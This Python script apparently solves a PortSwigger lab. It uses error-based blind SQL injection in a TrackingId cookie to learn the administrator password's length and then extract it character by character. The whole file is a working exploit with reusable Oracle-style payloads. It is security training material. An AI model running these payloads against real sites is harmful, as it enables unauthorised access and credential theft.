#!/usr/bin/python3
#https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors
#Find the length of the administrator password via conditional errors, then brute-force it one character at a time.
import requests,string
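# Target lab instance (intentionally vulnerable PortSwigger host); change per lab run.
url = 'https://0a23003f0404ba6dc15226a500cf0001.web-security-academy.net/'
# Alphabet the lab password is drawn from: lower-case letters and digits only.
# A password containing anything else will make brute_force() fail loudly.
characters = list(string.ascii_lowercase) + list(string.digits)
# Fail instead of hanging forever if the lab instance stops answering.
TIMEOUT = 10


def length_payload(n):
    """Return the TrackingId suffix that raises a DB error only when the
    administrator password is exactly *n* characters long.

    The closing ``||'`` re-joins the application's own quote so the query
    stays syntactically valid; the error (1/0) is what leaks the condition.
    """
    return (
        "'||(SELECT CASE WHEN LENGTH(password)=%s THEN TO_CHAR(1/0) ELSE '' END "
        "FROM users WHERE username='administrator')||'" % n
    )


def char_payload(position, char):
    """Return the suffix that raises a DB error only when the password
    character at 1-based *position* equals *char*.

    *char* must come from ``characters``; it is spliced into a quoted SQL
    literal unescaped, so a quote or backslash would break the probe.
    """
    return (
        "'||(SELECT CASE WHEN SUBSTR(password,%s,1)='%s' THEN TO_CHAR(1/0) ELSE '' END "
        "FROM users WHERE username='administrator')||'" % (position, char)
    )


def triggers_error(session, tracking_id, payload):
    """Send one probe and report whether the server answered HTTP 500.

    A 500 means the injected CASE evaluated the 1/0 branch, i.e. the
    condition encoded in *payload* is true for the administrator row.
    """
    cookies = {'TrackingId': tracking_id + payload}
    r = session.get(url, cookies=cookies, timeout=TIMEOUT)
    return r.status_code == 500


def find_length(session, tracking_id, max_len=30):
    """Return the administrator password length, probing 1..max_len-1.

    Returns None when no length in range triggers the error (wrong alphabet,
    wrong host, or the conditional-error channel is not working).
    """
    for n in range(1, max_len):
        if triggers_error(session, tracking_id, length_payload(n)):
            return n
    return None


def brute_force(session, tracking_id, length):
    """Recover a password of the given *length* one position at a time.

    Stops probing a position as soon as its character is confirmed.
    Raises RuntimeError if no candidate matches at some position, rather
    than silently returning a shorter (wrong) password.
    """
    password = ''
    for pos in range(1, length + 1):
        for char in characters:
            if triggers_error(session, tracking_id, char_payload(pos, char)):
                print("digit found: %s" % char)
                password += char
                break
        else:
            raise RuntimeError("no candidate matched at position %d" % pos)
    return password


def main():
    """Fetch a TrackingId, then leak the administrator password via
    error-based blind SQL injection in that cookie."""
    s = requests.Session()
    r = s.get(url, timeout=TIMEOUT)
    # The lab sets TrackingId on the first visit; KeyError here means the
    # instance URL is wrong or the lab has expired.
    tcookie = r.cookies["TrackingId"]
    print(tcookie)
    length = find_length(s, tcookie)
    if length is None:
        raise SystemExit("Could not determine the password length")
    print("The password length is %s" % length)
    password = brute_force(s, tcookie, length)
    print("Administrator password is: " + password)


if __name__ == "__main__":
    main()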